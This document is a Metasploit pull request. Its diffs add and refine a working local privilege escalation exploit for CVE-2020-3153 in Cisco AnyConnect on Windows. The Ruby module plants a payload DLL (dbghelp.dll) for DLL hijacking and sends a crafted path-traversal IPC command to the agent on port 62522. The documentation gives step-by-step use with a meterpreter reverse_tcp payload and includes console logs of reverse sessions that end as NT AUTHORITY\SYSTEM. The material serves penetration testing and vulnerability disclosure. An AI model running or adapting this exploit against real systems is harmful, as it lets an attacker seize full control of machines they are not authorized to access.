### PR TITLE
Add Cisco AnyConnect Priv Esc through Path Traversal module

### DIFF
--- a/documentation/modules/exploit/windows/local/anyconnect_path_traversal_lpe.md
+++ b/documentation/modules/exploit/windows/local/anyconnect_path_traversal_lpe.md
@@ -1,3 +1,5 @@
+## Vulnerable Application
+
 The installer component of Cisco AnyConnect Secure Mobility Client for Windows
 prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
 to create/overwrite files in arbitrary locations with system level privileges.
@@ -11,11 +13,9 @@ vulnerable to DLL hijacking, a specially crafted DLL (`dbghelp.dll`) is created
 at the same location `vpndownloader` will be copied to get code execution with
 system privileges.
 
-This exploit has been succesfully tested against Cisco AnyConnect Secure
+This exploit has been successfully tested against Cisco AnyConnect Secure
 Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
 version 1909 (x64) and Windows 7 SP1 (x86).
-
-## Vulnerable Application
 
 Unfortunately, AnyConnect Secure Mobility Client is not publicly available.
 Only customers with active contracts can download it.
@@ -27,14 +27,15 @@ Only customers with active contracts can download it.
   3. Get a session with non-administrative privileges
   4. Do: ```use exploit/windows/local/anyconnect_path_traversal_lpe```
   5. Do: ```set SESSION <SESSION>```
-  6. Do: ```set LHOST <LHOST>```
-  7. Do: ```set LPORT <LPORT>```
-  8. Do: ```check```
-  9. Do: ```run```
-  10. You should get a new session with system privileges
+  6. Do: ```set payload windows/meterpreter/reverse_tcp```
+  7. Do: ```set LHOST <LHOST>```
+  8. Do: ```set LPORT <LPORT>```
+  9. Do: ```check```
+  10. Do: ```run```
+  11. You should get a new session with system privileges
 
 ## Options
-  **ForceExploit**
+### ForceExploit
 
   Set this to `true` to override the `check` result during exploitation.
 
@@ -45,6 +46,8 @@ Only customers with active contracts can download it.
   ```
   msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set SESSION 8
   SESSION => 8
+  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set payload windows/meterpreter/reverse_tcp
+  payload => windows/meterpreter/reverse_tcp
   msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LHOST 172.16.60.1
   LHOST => 172.16.60.1
   msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LPORT 4445
@@ -89,6 +92,8 @@ Only customers with active contracts can download it.
   ```
   msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set SESSION 8
   SESSION => 8
+  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set payload windows/meterpreter/reverse_tcp
+  payload => windows/meterpreter/reverse_tcp
   msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LHOST 172.16.60.1
   LHOST => 172.16.60.1
   msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LPORT 4445

--- a/documentation/modules/exploit/windows/local/anyconnect_path_traversal_lpe.md
+++ b/documentation/modules/exploit/windows/local/anyconnect_path_traversal_lpe.md
@@ -1,0 +1,129 @@
+The installer component of Cisco AnyConnect Secure Mobility Client for Windows
+prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
+to create/overwrite files in arbitrary locations with system level privileges.
+
+The attack consists in sending a specially crafted RPC request to the TCP port
+62522 on the loopback device, which is exposed by the Cisco AnyConnect Secure
+Mobility Agent service. This service will then launch the vulnerable installer
+component (`vpndownloader`), which copies itself to an arbitrary location
+before being executed with system privileges. Since `vpndownloader` is also
+vulnerable to DLL hijacking, a specially crafted DLL (`dbghelp.dll`) is created
+at the same location `vpndownloader` will be copied to get code execution with
+system privileges.
+
+This exploit has been succesfully tested against Cisco AnyConnect Secure
+Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
+version 1909 (x64) and Windows 7 SP1 (x86).
+
+## Vulnerable Application
+
+Unfortunately, AnyConnect Secure Mobility Client is not publicly available.
+Only customers with active contracts can download it.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Get a session with non-administrative privileges
+  4. Do: ```use exploit/windows/local/anyconnect_path_traversal_lpe```
+  5. Do: ```set SESSION <SESSION>```
+  6. Do: ```set LHOST <LHOST>```
+  7. Do: ```set LPORT <LPORT>```
+  8. Do: ```check```
+  9. Do: ```run```
+  10. You should get a new session with system privileges
+
+## Options
+  **ForceExploit**
+
+  Set this to `true` to override the `check` result during exploitation.
+
+## Scenarios
+
+### Windows 10 version 1909 (x64) with AnyConnect 4.7.4056
+
+  ```
+  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set SESSION 8
+  SESSION => 8
+  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LHOST 172.16.60.1
+  LHOST => 172.16.60.1
+  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LPORT 4445
+  LPORT => 4445
+  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set verbose true
+  verbose => true
+  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > check
+
+  [*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
+  [+] Cisco AnyConnect version 4.7.4056.0.0 appears to be vulnerable
+  [*] The target appears to be vulnerable.
+  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > run
+
+  [*] Started reverse TCP handler on 172.16.60.1:4445
+  [*] Found vpndownloader.exe path: 'C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
+  [+] Cisco AnyConnect version 4.7.4056.0.0 appears to be vulnerable
+  [*] "-ipc" argument needed
+  [*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
+  [*] RPC Command: "CAC-nc-install	-ipc=1820	C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\nope\nope\nope\nope\../../../../vpndownloader.exe	-"
+  [*] Connecting to the AnyConnect agent on 127.0.0.1:62522
+  [*] Send the encoded RPC command (size = 269 bytes)
+  [*] Sending stage (176195 bytes) to 172.16.60.202
+  [*] Meterpreter session 9 opened (172.16.60.1:4445 -> 172.16.60.202:49765) at 2020-06-19 19:35:29 +0200
+  [+] Deleted C:\ProgramData\Cisco\dbghelp.dll
+  [+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
+  [*] Shutdown the socket
+
+  meterpreter > getuid
+  Server username: NT AUTHORITY\SYSTEM
+  meterpreter > sysinfo
+  Computer        : DESKTOP-UUQE0B4
+  OS              : Windows 10 (10.0 Build 18363).
+  Architecture    : x64
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x86/windows
+  ```
+
+### Windows 7 SP1 (x86) with AnyConnect 4.5.5030
+
+  ```
+  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set SESSION 8
+  SESSION => 8
+  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LHOST 172.16.60.1
+  LHOST => 172.16.60.1
+  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set LPORT 4445
+  LPORT => 4445
+  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > set verbose true
+  verbose => true
+  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > check
+
+  [*] Found vpndownloader.exe path: 'C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
+  [+] Cisco AnyConnect version 4.5.5030.0.0 appears to be vulnerable
+  [*] The target appears to be vulnerable.
+  msf5 exploit(windows/local/anyconnect_path_traversal_lpe) > run
+
+  [*] Started reverse TCP handler on 172.16.60.1:4445
+  [*] Found vpndownloader.exe path: 'C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vpndownloader.exe'
+  [+] Cisco AnyConnect version 4.5.5030.0.0 appears to be vulnerable
+  [*] "-ipc" argument not needed
+  [*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
+  [*] RPC Command: "CAC-nc-install	C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\nope\nope\nope\nope\../../../../vpndownloader.exe	-"
+  [*] Connecting to the AnyConnect agent on 127.0.0.1:62522
+  [*] Send the encoded RPC command (size = 247 bytes)
+  [*] Sending stage (176195 bytes) to 172.16.60.134
+  [*] Meterpreter session 10 opened (172.16.60.1:4445 -> 172.16.60.134:49218) at 2020-06-19 19:41:53 +0200
+  [+] Deleted C:\ProgramData\Cisco\dbghelp.dll
+  [+] Deleted C:\ProgramData\Cisco\vpndownloader.exe
+  [*] Shutdown the socket
+
+  meterpreter > getuid
+  Server username: NT AUTHORITY\SYSTEM
+  meterpreter > sysinfo
+  Computer        : WIN7-DEV
+  OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+  Architecture    : x86
+  System Language : en_US
+  Domain          : WORKGROUP
+  Logged On Users : 2
+  Meterpreter     : x86/windows
+  ```

--- a/documentation/modules/exploit/windows/local/anyconnect_path_traversal_lpe.md
+++ b/documentation/modules/exploit/windows/local/anyconnect_path_traversal_lpe.md
@@ -2,37 +2,50 @@
 
 The installer component of Cisco AnyConnect Secure Mobility Client for Windows
 prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
-to create/overwrite files in arbitrary locations with system level privileges.
+to create/overwrite files in arbitrary locations as the SYSTEM user.
 
-The attack consists in sending a specially crafted RPC request to the TCP port
+The attack consists of sending a specially crafted IPC request to the TCP port
 62522 on the loopback device, which is exposed by the Cisco AnyConnect Secure
 Mobility Agent service. This service will then launch the vulnerable installer
 component (`vpndownloader`), which copies itself to an arbitrary location
-before being executed with system privileges. Since `vpndownloader` is also
+before being executed as the SYSTEM user. Since `vpndownloader` is also
 vulnerable to DLL hijacking, a specially crafted DLL (`dbghelp.dll`) is created
-at the same location `vpndownloader` will be copied to get code execution with
-system privileges.
+at the same location `vpndownloader` is copied to get code execution as the
+SYSTEM user.
 
 This exploit has been successfully tested against Cisco AnyConnect Secure
 Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
 version 1909 (x64) and Windows 7 SP1 (x86).
 
-Unfortunately, AnyConnect Secure Mobility Client is not publicly available.
-Only customers with active contracts can download it.
+AnyConnect Secure Mobility Client is not publicly available and only customers
+with active contracts can download it. For this reason, download links have not
+been provided.
+
+## Install the Application
+
+  1. Unzip the AnyConnect package
+  2. Open the extracted folder
+  3. Run `Setup.exe`
+  4. Select `Core & VPN` only (no need to install the full package)
+  5. Click `Install Selected`
+  6. Confirm you want to install this specific version of Anyconnect (click `OK`)
+  7. Accept the EULA (click `Accept`)
+  8. `Installation complete` (click `OK`)... enjoy
+
+  or just run the `anyconnect-win-x.y.zzzzz-core-vpn-predeploy-k9.msi` installer and follow the installation steps keeping the default options.
 
 ## Verification Steps
 
-  1. Install the application
-  2. Start msfconsole
-  3. Get a session with non-administrative privileges
-  4. Do: ```use exploit/windows/local/anyconnect_path_traversal_lpe```
-  5. Do: ```set SESSION <SESSION>```
-  6. Do: ```set payload windows/meterpreter/reverse_tcp```
-  7. Do: ```set LHOST <LHOST>```
-  8. Do: ```set LPORT <LPORT>```
-  9. Do: ```check```
-  10. Do: ```run```
-  11. You should get a new session with system privileges
+  1. Start msfconsole
+  2. Get a session with non-administrative privileges
+  3. Do: ```use exploit/windows/local/anyconnect_path_traversal_lpe```
+  4. Do: ```set SESSION <SESSION>```
+  5. Do: ```set payload windows/meterpreter/reverse_tcp```
+  6. Do: ```set LHOST <LHOST>```
+  7. Do: ```set LPORT <LPORT>```
+  8. Do: ```check```
+  9. Do: ```run```
+  10. You should get a new session as the SYSTEM user
 
 ## Options
 ### ForceExploit
@@ -66,9 +79,9 @@ Only customers with active contracts can download it.
   [+] Cisco AnyConnect version 4.7.4056.0.0 appears to be vulnerable
   [*] "-ipc" argument needed
   [*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
-  [*] RPC Command: "CAC-nc-install	-ipc=1820	C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\nope\nope\nope\nope\../../../../vpndownloader.exe	-"
+  [*] IPC Command: "CAC-nc-install	-ipc=18201	C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client\vphU\vphU\vphU\vphU\../../../../vpndownloader.exe	-"
   [*] Connecting to the AnyConnect agent on 127.0.0.1:62522
-  [*] Send the encoded RPC command (size = 269 bytes)
+  [*] Send the encoded IPC command (size = 270 bytes)
   [*] Sending stage (176195 bytes) to 172.16.60.202
   [*] Meterpreter session 9 opened (172.16.60.1:4445 -> 172.16.60.202:49765) at 2020-06-19 19:35:29 +0200
   [+] Deleted C:\ProgramData\Cisco\dbghelp.dll
@@ -112,9 +125,9 @@ Only customers with active contracts can download it.
   [+] Cisco AnyConnect version 4.5.5030.0.0 appears to be vulnerable
   [*] "-ipc" argument not needed
   [*] Writing the payload to C:\ProgramData\Cisco\dbghelp.dll
-  [*] RPC Command: "CAC-nc-install	C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\nope\nope\nope\nope\../../../../vpndownloader.exe	-"
+  [*] IPC Command: "CAC-nc-install	C:\Program Files\Cisco\Cisco AnyConnect Secure Mobility Client\vphU\vphU\vphU\vphU\../../../../vpndownloader.exe	-"
   [*] Connecting to the AnyConnect agent on 127.0.0.1:62522
-  [*] Send the encoded RPC command (size = 247 bytes)
+  [*] Send the encoded IPC command (size = 247 bytes)
   [*] Sending stage (176195 bytes) to 172.16.60.134
   [*] Meterpreter session 10 opened (172.16.60.1:4445 -> 172.16.60.134:49218) at 2020-06-19 19:41:53 +0200
   [+] Deleted C:\ProgramData\Cisco\dbghelp.dll

--- a/modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
+++ b/modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
@@ -4,23 +4,13 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Local
-  Rank = NormalRanking
+  Rank = ExcellentRanking
 
 
   include Msf::Post::Windows::Priv
-  include Msf::Post::Windows::Services
-  include Msf::Post::Windows::FileSystem
-
-
-
-  # In-use:
-  # include file_version
   include Msf::Post::Windows::FileInfo
-  # includes file_exist?
   include Msf::Post::File
-  # includes generate_payload_dll
   include Msf::Exploit::EXE
-  # includes register_files_for_cleanup
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
@@ -29,26 +19,33 @@ class MetasploitModule < Msf::Exploit::Local
         info,
         'Name' => 'Cisco AnyConnect Priv Esc through Path Traversal',
         'Description' => %q{
-        TODO:
-        The update functionality of the Cisco AnyConnect Secure Mobility Client for Windows is affected by a path traversal vulnerability that allows local attackers to create/overwrite files in arbitrary locations. Successful exploitation of this vulnerability allows the attacker to gain SYSTEM privileges.
+          The installer component of Cisco AnyConnect Secure Mobility Client for Windows
+          prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
+          to create/overwrite files in arbitrary locations with system level privileges.
+
+          The attack consists in sending a specially crafted RPC request to the TCP port
+          62522 on the loopback device, which is exposed by the Cisco AnyConnect Secure
+          Mobility Agent service. This service will then launch the vulnerable installer
+          component (`vpndownloader`), which copies itself to an arbitrary location
+          before being executed with system privileges. Since `vpndownloader` is also
+          vulnerable to DLL hijacking, a specially crafted DLL (`dbghelp.dll`) is created
+          at the same location `vpndownloader` will be copied to get code execution with
+          system privileges.
+
+          This exploit has been succesfully tested against Cisco AnyConnect Secure
+          Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
+          version 1909 (x64) and Windows 7 SP1 (x86).
         },
         'License' => MSF_LICENSE,
-        # The place to add your name/handle and email.  Twitter and other contact info isn't handled here.
-        # Add reference to additional authors, like those creating original proof of concepts or
-        # reference materials.
-        # It is also common to comment in who did what (PoC vs metasploit module, etc)
         'Author' =>
           [
             'Yorick Koster', # original PoC, analysis
-            'Antoine GOICHOT (ATGO)', # original PoC
+            'Antoine Goichot (ATGO)', # PoC
             'Christophe De La Fuente' # msf module
           ],
         'Platform' => [ 'windows' ],
         'Arch' => [ ARCH_X86, ARCH_X64 ],
-        # What types of sessions we can use this module in conjunction with.  Most modules use libraries
-        # which work on shell and meterpreter, but there may be a nuance between one of them, so best to
-        # test both to ensure compatibility.
-        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'SessionTypes' => [ 'meterpreter' ],
         'Targets' => [[ 'Auto', {} ]],
         'Privileged' => true,
         'References' =>
@@ -69,8 +66,6 @@ class MetasploitModule < Msf::Exploit::Local
     register_advanced_options [
       OptBool.new('ForceExploit', [ false, 'Override check result', false ])
     ]
-
-    @file_name = 'vpndownloader.exe'
   end
 
   # See AnyConnect IPC protocol articles:
@@ -106,20 +101,13 @@ class MetasploitModule < Msf::Exploit::Local
     array :body, label: 'Body', type: :cipc_tlv, read_until: :eof
   end
 
-  # Simplify pulling the writable directory variable
-  #def base_dir
-  #  datastore['WritableDir'].to_s
-  #end
-
   def check
-    fail_with(Failure::None, 'Session is already elevated') if is_system?
-
     file_path = nil
     path = 'Cisco\\Cisco AnyConnect Secure Mobility Client'
     [ 'C:\\Program Files (x86)', 'C:\\Program Files' ].each do |pf_path|
-      if file_exist?([pf_path, path, @file_name].join('\\'))
+      if file_exist?([pf_path, path, 'vpndownloader.exe'].join('\\'))
         @installation_path = "#{pf_path}\\#{path}"
-        file_path = "#{@installation_path}\\#{@file_name}"
+        file_path = "#{@installation_path}\\vpndownloader.exe"
         break
       end
     end
@@ -141,27 +129,27 @@ class MetasploitModule < Msf::Exploit::Local
         vprint_warning('Unable to retrieve vpndownloader.exe file version')
       end
     else
-      vprint_warning(
-        'vpndownloader.exe not found on the file system, file version check '\
-        'won\'t be possible'
-      )
+      vprint_warning('vpndownloader.exe not found on the file system')
+      return CheckCode::Safe
     end
 
     CheckCode::Unknown
   end
 
   def exploit
+    fail_with(Failure::None, 'Session is already elevated') if is_system?
+
     if check == CheckCode::Safe
       unless datastore['ForceExploit']
-        fail_with( Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+        fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
       end
       print_warning 'Target does not appear to be vulnerable'
     end
 
     cac_cmd = '"CAC-nc-install'
-    if @ac_version >= Gem::Version.new('4.7')
+    if @ac_version && @ac_version >= Gem::Version.new('4.7')
       vprint_status('"-ipc" argument needed')
-      cac_cmd << "\t-ipc=666"
+      cac_cmd << "\t-ipc=#{rand_text_numeric(4)}"
     else
       vprint_status('"-ipc" argument not needed')
     end
@@ -170,8 +158,7 @@ class MetasploitModule < Msf::Exploit::Local
     print_status("Writing the payload to #{dbghelp_path}")
 
     begin
-      #:dll_exitprocess
-      payload_dll = generate_payload_dll
+      payload_dll = generate_payload_dll(dll_exitprocess: true)
       write_file(dbghelp_path, payload_dll)
       register_file_for_cleanup(dbghelp_path)
     rescue ::Rex::Post::Meterpreter::RequestError => e
@@ -181,8 +168,8 @@ class MetasploitModule < Msf::Exploit::Local
     # vpndownloader.exe will be copied to "C:\ProgramData\Cisco\" (assuming the
     # normal process will copy the file to
     # "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Installer\XXXX.tmp\")
-    register_file_for_cleanup("C:\\ProgramData\\Cisco\\#{@file_name}")
-    cac_cmd << "\t#{@installation_path}\\nope\\nope\\nope\\nope\\../../../../#{@file_name}\t-\""
+    register_file_for_cleanup("C:\\ProgramData\\Cisco\\vpndownloader.exe")
+    cac_cmd << "\t#{@installation_path}\\nope\\nope\\nope\\nope\\../../../../vpndownloader.exe\t-\""
     vprint_status("RPC Command: #{cac_cmd}")
 
     cipc_msg = CIPCMessage.new
@@ -194,31 +181,33 @@ class MetasploitModule < Msf::Exploit::Local
     cipc_msg.body << CIPCTlv.new(
       msg_type: 0,
       msg_index: 6,
-      msg_value: "#{@installation_path}\\#{@file_name}"
+      msg_value: "#{@installation_path}\\vpndownloader.exe"
     )
 
     vprint_status('Connecting to the AnyConnect agent on 127.0.0.1:62522')
-    socket = client.net.socket.create(
-      Rex::Socket::Parameters.new(
-        'PeerHost' => '127.0.0.1',
-        'PeerPort' => 62522,
-        'Proto'    => 'tcp'
+    begin
+      socket = client.net.socket.create(
+        Rex::Socket::Parameters.new(
+          'PeerHost' => '127.0.0.1',
+          'PeerPort' => 62522,
+          'Proto'    => 'tcp'
+        )
       )
-    )
+    rescue Rex::ConnectionError => e
+      fail_with(Failure::Unreachable, e.message)
+    end
 
     vprint_status("Send the encoded RPC command (size = #{cipc_msg.num_bytes} bytes)")
     socket.write(cipc_msg.to_binary_s)
-    require 'pry';binding.pry
+    socket.flush
+    # Give FileDropper some time to cleanup before handing over to the operator
+    Rex::sleep(3)
 
-  #ensure
-    #vprint_status("Close the socket")
-    #socket.close if socket
+  ensure
+    if socket
+      vprint_status("Shutdown the socket")
+      socket.shutdown
+    end
   end
 
-  #def on_new_session(session)
-  #end
-
-  #def cleanup
-    # Shortcut Msf::Exploit::FileDropper#cleanup to make sure #on_new_session will run first to cleanup. Elevated privileges are required to delete vpndownloader.exe.
-  #end
 end

--- a/modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
+++ b/modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
@@ -6,7 +6,6 @@
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
-
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::FileInfo
   include Msf::Post::File
@@ -32,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Local
           at the same location `vpndownloader` will be copied to get code execution with
           system privileges.
 
-          This exploit has been succesfully tested against Cisco AnyConnect Secure
+          This exploit has been successfully tested against Cisco AnyConnect Secure
           Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
           version 1909 (x64) and Windows 7 SP1 (x86).
         },
@@ -50,10 +49,9 @@ class MetasploitModule < Msf::Exploit::Local
         'Privileged' => true,
         'References' =>
           [
-            [ 'Cisco Bug ID', 'CSCvs46327' ],
-            [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-cisco-anyconnect-privilege-elevation-through-path-traversal/'],
-            [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-win-path-traverse-qO4HWBsj'],
-            [ 'CVE', '2020-3153']
+            ['URL', 'https://ssd-disclosure.com/ssd-advisory-cisco-anyconnect-privilege-elevation-through-path-traversal/'],
+            ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ac-win-path-traverse-qO4HWBsj'],
+            ['CVE', '2020-3153']
           ],
         'DisclosureDate' => 'Feb 19 2020',
         'DefaultTarget' => 0,
@@ -63,8 +61,16 @@ class MetasploitModule < Msf::Exploit::Local
       )
     )
 
+    register_options [
+      OptString.new('INSTALL_PATH', [
+        false,
+        'Cisco AnyConnect Secure Mobility Client installation path (where \'vpndownloader.exe\''\
+          ' should be found). It will be automatically detected if not set.'
+      ])
+    ]
+
     register_advanced_options [
-      OptBool.new('ForceExploit', [ false, 'Override check result', false ])
+      OptBool.new('ForceExploit', [false, 'Override check result', false])
     ]
   end
 
@@ -101,49 +107,74 @@ class MetasploitModule < Msf::Exploit::Local
     array :body, label: 'Body', type: :cipc_tlv, read_until: :eof
   end
 
-  def check
-    file_path = nil
+  def detect_path
+    program_files_paths = Set.new([get_env('ProgramFiles')])
+    program_files_paths << get_env('ProgramFiles(x86)')
     path = 'Cisco\\Cisco AnyConnect Secure Mobility Client'
-    [ 'C:\\Program Files (x86)', 'C:\\Program Files' ].each do |pf_path|
-      if file_exist?([pf_path, path, 'vpndownloader.exe'].join('\\'))
-        @installation_path = "#{pf_path}\\#{path}"
-        file_path = "#{@installation_path}\\vpndownloader.exe"
-        break
-      end
+
+    program_files_paths.each do |program_files_path|
+      next unless file_exist?([program_files_path, path, 'vpndownloader.exe'].join('\\'))
+      return "#{program_files_path}\\#{path}"
     end
 
-    if file_path
-      vprint_status("Found vpndownloader.exe path: '#{file_path}'")
-      version = file_version(file_path)
-      if version
-        patched_version = Gem::Version.new('4.8.02042')
-        @ac_version    = Gem::Version.new(version.join('.'))
-        if @ac_version < patched_version
-          vprint_good("Cisco AnyConnect version #{@ac_version} appears to be vulnerable")
-          return CheckCode::Appears
-        else
-          vprint_error("Cisco AnyConnect version #{@ac_version} is not vulnerable")
-          return CheckCode::Safe
-        end
-      else
-        vprint_warning('Unable to retrieve vpndownloader.exe file version')
-      end
+    nil
+  end
+
+  def sanitize_path(path)
+    return nil unless path
+
+    path = path.strip
+    loop do
+      break if path.last != '\\'
+      path.chop!
+    end
+    path
+  end
+
+  def check
+    install_path = sanitize_path(datastore['INSTALL_PATH'])
+    if install_path&.!= ''
+      vprint_status("Skipping installation path detection and use provided path: #{install_path}")
+      @installation_path = file_exist?([install_path, 'vpndownloader.exe'].join('\\')) ? install_path : nil
     else
-      vprint_warning('vpndownloader.exe not found on the file system')
-      return CheckCode::Safe
+      vprint_status('Try to detect installation path...')
+      @installation_path = detect_path
     end
 
-    CheckCode::Unknown
+    unless @installation_path
+      return CheckCode.Safe('vpndownloader.exe not found on file system')
+    end
+
+    file_path = "#{@installation_path}\\vpndownloader.exe"
+    vprint_status("Found vpndownloader.exe path: '#{file_path}'")
+
+    version = file_version(file_path)
+    unless version
+      return CheckCode.Unknown('Unable to retrieve vpndownloader.exe file version')
+    end
+
+    patched_version = Gem::Version.new('4.8.02042')
+    @ac_version = Gem::Version.new(version.join('.'))
+    if @ac_version < patched_version
+      return CheckCode.Appears("Cisco AnyConnect version #{@ac_version} < #{patched_version}.")
+    else
+      return CheckCode.Safe("Cisco AnyConnect version #{@ac_version} >= #{patched_version}.")
+    end
   end
 
   def exploit
     fail_with(Failure::None, 'Session is already elevated') if is_system?
 
-    if check == CheckCode::Safe
-      unless datastore['ForceExploit']
-        fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
+    check_result = check
+    print_status(check_result.message)
+    if check_result == CheckCode::Safe
+      unless @installation_path
+        fail_with(Failure::NoTarget, 'Installation path not found (try to set INSTALL_PATH if automatic detection failed)')
       end
-      print_warning 'Target does not appear to be vulnerable'
+      unless datastore['ForceExploit']
+        fail_with(Failure::NotVulnerable, 'Target is not vulnerable (set ForceExploit to override)')
+      end
+      print_warning('Override check result and attempt exploitation anyway')
     end
 
     cac_cmd = '"CAC-nc-install'
@@ -154,7 +185,8 @@ class MetasploitModule < Msf::Exploit::Local
       vprint_status('"-ipc" argument not needed')
     end
 
-    dbghelp_path = 'C:\\ProgramData\\Cisco\\dbghelp.dll'
+    program_data_path = get_env('ProgramData')
+    dbghelp_path = "#{program_data_path}\\Cisco\\dbghelp.dll"
     print_status("Writing the payload to #{dbghelp_path}")
 
     begin
@@ -168,8 +200,9 @@ class MetasploitModule < Msf::Exploit::Local
     # vpndownloader.exe will be copied to "C:\ProgramData\Cisco\" (assuming the
     # normal process will copy the file to
     # "C:\ProgramData\Cisco\Cisco AnyConnect Secure Mobility Client\Temp\Installer\XXXX.tmp\")
-    register_file_for_cleanup("C:\\ProgramData\\Cisco\\vpndownloader.exe")
-    cac_cmd << "\t#{@installation_path}\\nope\\nope\\nope\\nope\\../../../../vpndownloader.exe\t-\""
+    register_file_for_cleanup("#{program_data_path}\\Cisco\\vpndownloader.exe")
+    junk = Rex::Text.rand_text_alpha(4)
+    cac_cmd << "\t#{@installation_path}\\#{junk}\\#{junk}\\#{junk}\\#{junk}\\../../../../vpndownloader.exe\t-\""
     vprint_status("RPC Command: #{cac_cmd}")
 
     cipc_msg = CIPCMessage.new
@@ -201,11 +234,10 @@ class MetasploitModule < Msf::Exploit::Local
     socket.write(cipc_msg.to_binary_s)
     socket.flush
     # Give FileDropper some time to cleanup before handing over to the operator
-    Rex::sleep(3)
-
+    Rex.sleep(3)
   ensure
     if socket
-      vprint_status("Shutdown the socket")
+      vprint_status('Shutdown the socket')
       socket.shutdown
     end
   end

--- a/modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
+++ b/modules/exploits/windows/local/anyconnect_path_traversal_lpe.rb
@@ -1,0 +1,224 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking
+
+
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Services
+  include Msf::Post::Windows::FileSystem
+
+
+
+  # In-use:
+  # include file_version
+  include Msf::Post::Windows::FileInfo
+  # includes file_exist?
+  include Msf::Post::File
+  # includes generate_payload_dll
+  include Msf::Exploit::EXE
+  # includes register_files_for_cleanup
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco AnyConnect Priv Esc through Path Traversal',
+        'Description' => %q{
+        TODO:
+        The update functionality of the Cisco AnyConnect Secure Mobility Client for Windows is affected by a path traversal vulnerability that allows local attackers to create/overwrite files in arbitrary locations. Successful exploitation of this vulnerability allows the attacker to gain SYSTEM privileges.
+        },
+        'License' => MSF_LICENSE,
+        # The place to add your name/handle and email.  Twitter and other contact info isn't handled here.
+        # Add reference to additional authors, like those creating original proof of concepts or
+        # reference materials.
+        # It is also common to comment in who did what (PoC vs metasploit module, etc)
+        'Author' =>
+          [
+            'Yorick Koster', # original PoC, analysis
+            'Antoine GOICHOT (ATGO)', # original PoC
+            'Christophe De La Fuente' # msf module
+          ],
+        'Platform' => [ 'windows' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        # What types of sessions we can use this module in conjunction with.  Most modules use libraries
+        # which work on shell and meterpreter, but there may be a nuance between one of them, so best to
+        # test both to ensure compatibility.
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'Privileged' => true,
+        'References' =>
+          [
+            [ 'Cisco Bug ID', 'CSCvs46327' ],
+            [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-cisco-anyconnect-privilege-elevation-through-path-traversal/'],
